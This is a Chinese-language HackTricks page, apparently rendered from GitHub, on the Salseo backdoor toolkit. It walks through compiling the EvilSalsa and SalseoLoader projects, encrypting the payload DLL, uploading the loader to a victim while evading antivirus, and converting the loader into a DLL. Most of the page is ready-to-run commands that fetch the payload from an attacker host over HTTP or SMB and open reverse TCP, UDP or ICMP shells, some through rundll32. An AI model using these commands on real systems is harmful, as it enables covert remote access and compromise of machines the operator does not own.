hacktricks/backdoors/salseo.md

7.3 KiB
Raw Blame History

Salseo

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS红队专家

支持HackTricks的其他方式

编译二进制文件

从github下载源代码并编译EvilSalsaSalseoLoader。您需要安装Visual Studio来编译代码。

为将要使用它们的Windows系统架构编译这些项目如果Windows支持x64请为该架构编译

您可以在Visual Studio中的左侧"Build"选项卡中的**"Platform Target"选择架构**。

(**如果找不到这些选项,请点击**"Project Tab",然后点击"<Project Name> Properties"**)

然后构建这两个项目Build -> Build Solution日志中将显示可执行文件的路径

准备后门

首先,您需要对EvilSalsa.dll进行编码。您可以使用python脚本encrypterassembly.py或编译项目EncrypterAssembly来执行此操作:

Python

python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt

Windows

Windows

EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt

现在你已经拥有执行所有Salseo操作所需的一切编码的EvilDalsa.dllSalseoLoader的二进制文件。

将SalseoLoader.exe二进制文件上传到机器上。它们不应该被任何杀毒软件检测到...

执行后门

获取TCP反向shell通过HTTP下载编码的dll

记得启动一个nc作为反向shell监听器以及一个HTTP服务器来提供编码的evilsalsa。

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

获取UDP反向shell通过SMB下载编码的dll

记得启动一个nc作为反向shell监听器并启动一个SMB服务器来提供编码的evilsalsaimpacket-smbserver

SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

获取 ICMP 反向 shell编码的 dll 已经在受害者内部)

这次你需要在客户端上使用一个特殊工具来接收反向 shell。下载 https://github.com/inquisb/icmpsh

禁用 ICMP 回复:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

执行客户端:

python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"

在受害者内部让我们执行salseo操作

SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

编译 SalseoLoader 作为导出主函数的 DLL

使用 Visual Studio 打开 SalseoLoader 项目。

在主函数之前添加:[DllExport]

为此项目安装 DllExport

工具 --> NuGet 包管理器 --> 管理解决方案的 NuGet 包...

在浏览选项卡中搜索 DllExport 包,并按 Install接受弹出窗口

在您的项目文件夹中会出现文件:DllExport.batDllExport_Configure.bat

卸载 DllExport

点击 卸载(是的,这很奇怪,但相信我,这是必要的)

退出 Visual Studio 并执行 DllExport_configure

只需 退出 Visual Studio

然后,转到您的 SalseoLoader 文件夹执行 DllExport_Configure.bat

选择 x64(如果您将在 x64 系统中使用它,这是我的情况),选择 System.Runtime.InteropServices(在 DllExport 的命名空间 中)并按 应用

再次使用 Visual Studio 打开项目

[DllExport] 不应再被标记为错误

构建解决方案

选择 输出类型 = 类库(项目 --> SalseoLoader 属性 --> 应用程序 --> 输出类型 = 类库)

选择 x64 平台(项目 --> SalseoLoader 属性 --> 构建 --> 平台目标 = x64

构建 解决方案:构建 --> 构建解决方案(在输出控制台中将显示新 DLL 的路径)

测试生成的 Dll

将 Dll 复制粘贴到要测试的位置。

执行:

rundll32.exe SalseoLoader.dll,main

如果没有出现错误那么你可能有一个功能正常的DLL

使用DLL获取shell

不要忘记使用一个HTTP服务器并设置一个nc监听器

Powershell

$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD

CMD

set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS红队专家

其他支持HackTricks的方式